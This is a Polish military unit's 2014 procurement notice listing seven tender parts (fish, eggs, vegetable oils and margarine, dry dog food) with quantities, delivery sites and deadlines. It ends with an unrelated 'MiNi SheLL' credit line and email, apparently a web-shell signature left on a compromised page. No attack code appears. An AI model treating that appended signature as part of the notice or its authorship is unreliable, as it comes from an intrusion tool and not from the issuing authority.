<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2014 godzina 11:00, miejsce: W siedzibie  Zamawiającego: Jednostka Wojskowa 4809, ul. Juzistek 2, 05-131 Zegrze, kancelaria jawna pokój nr 43, budynek nr 220..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa ryb świeżych i mrożonych do:

- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul. Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karp świeży tusza	kg	60
Pstrąg filet	kg	40
Łosoś filet	kg	40
Sandacz mrożony filet 	kg	40 
Dorsz mrożony filet	kg	2 300
Morszczuk mrożony filet	kg	900
Mintaj mrożony filet	kg	1 000
Śledzie solone majtasy filety	kg	660
Łosoś wędzony filet	kg	20
Makrela wędzona tusza	kg	680
Śledź marynowany	kg	540
Śledź po kaszubsku	kg	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II - zakup i dostawa ryb świeżych i mrożonych do:

- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dorsz mrożony filet	kg	200
Morszczuk mrożony filet	kg	80
Mintaj mrożony filet	kg	80
Śledzie solone majtasy filety kg	40
Makrela wędzona tusza	kg	40
Śledź marynowany	kg	60
Śledź po kaszubsku	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III - zakup i dostawa jaj spożywczych do:

- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul. Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja spożywcze klasy AL	
szt.- 137 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ IV - zakup i dostawa jaj spożywczych do:

- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja spożywcze klasy AL	
szt.	- 8 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> CZĘŚĆ V - zakup i dostawa tłuszczów roślinnych do:

- Grupa Zabezpieczenia (GZ) Zegrze, 05-131 Zegrze ul. Juzistek 2
- Grupa  Zabezpieczenia (GZ) Wesoła, 05-075 Warszawa - Wesoła, ul. Okuniewska 1
- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej rzepakowy	kg	920
Oliwa z oliwek	kg	20
Olej słonecznikowy kg	560
Mix tłuszczowy jednoporcjowy kg	2 400
Margaryna	kg 725.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> CZĘŚĆ VI - zakup i dostawa tłuszczów roślinnych do:

- Grupa Zabezpieczenia (GZ) Przasnysz, 06-300 Przasnysz ul. Makowska1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej rzepakowy kg	80
Olej słonecznikowy kg  60
Mix tłuszczowy  jednoporcjowy	kg	160
Margaryna kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> CZĘŚĆ VII - zakup i dostawa karmy suchej dla psów do:

- Grupa Zabezpieczenia (GZ) Kazuń, 05-152 Kazuń Nowy Gmina Czosnów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Karma sucha dla psów kg	4 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.71.30.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com